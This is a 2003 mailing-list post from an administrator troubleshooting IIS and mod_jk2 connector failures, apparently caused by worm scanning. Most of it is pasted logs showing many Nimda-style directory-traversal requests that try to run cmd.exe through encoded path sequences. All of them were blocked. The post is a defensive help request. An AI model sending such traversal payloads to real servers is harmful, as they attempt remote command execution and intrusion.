IIS, mod_jk2, NIMDA, warnings, weird messages

["Kundrot, Steven" <St...@parexel.com>]

I'm receiving some interesting warning messages from the mod_jk2 connector
and from IIS in general.

In my IIS Log:

2003-03-04 09:14:08 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
403 -
2003-03-04 09:14:10 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:11 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
403 -
2003-03-04 09:14:12 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:12 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/c/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:14 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403
-
2003-03-04 09:14:15 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:16 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/d/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:17 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\
403 -
2003-03-04 09:14:17 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:19 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:14:19 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:14:21 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:22 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:41 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:14:41 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:22 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403
-
2003-03-04 09:15:24 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:27 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:15:27 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:15:29 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:35 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:37 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD
/scripts/..A..A..A..Awinnt/system32/cmd.exe /c+dir+c:\ 403 -


Note:  I've removed the IP addresses from the above messages and replaced
with xxx.xxx.xxx.xxx.

****************************************************************************
**********************************
****************************************************************************
**********************************

In my Windows Application Event Log:


Error: [jk_isapi_plugin.c (316)]: HttpFilterProc
[/scripts/..%5c../winnt/system32/cmd.exe] contains one or more invalid
escape sequences.
Error: [jk_isapi_plugin.c (316)]: HttpFilterProc
[/scripts/..%5c../winnt/system32/cmd.exe] contains one or more invalid
escape sequences.
Emerg:  [jk_isapi_plugin.c (324)]: HttpFilterProc
[/scripts/..A/../winnt/system32/cmd.exe] contains forbidden escape
sequences.
 
etc....

These emergencies and errors are followed by many warnings indicating that
the connector workers have failed to forward to my Tomcat instance.  The
workers are latter re-enabled.  These warning messages appear about every
4-5 hours.  Initially, they don't seem to affect the tomcat connector, but,
after the warnings are logged, if a user accesses the site, it takes an
exceptionally long time for a page to be served.  In watching the logs, the
connector is reporting a bunch of connection failures, but it eventually
recovers and re-enables.  The site works fine afterwards.  On some
occasions, IIS must be stopped/started in order for the site to behave
normally.  Has anyone else witnessed this in a production environment.  The
kicker is that I cannot reproduce this problem on my development/testing
machines.  I've load tested those environments and the connector is
performing beautifully.  It was once I pushed to production and made IIS
(damn IIS), available to the outside world.  I've searched on the web, and
it seems like these are indications of the NIMDA virus scanning the computer
looking for vulnerabilities.

Has anyone else seen these messages/errors?  Why would they be hurting the
tomcat connector?  Any suggestions?

Steve


The information transmitted in this communication is intended only for the
person or entity to which it is addressed and may contain confidential
and/or privileged material. Any review, retransmission, dissemination or
other use of, or taking of any action in reliance upon, this information by
persons or entities other than the intended recipient is prohibited. If you
received this in error, please destroy any copies, contact the sender and
delete the material from any computer.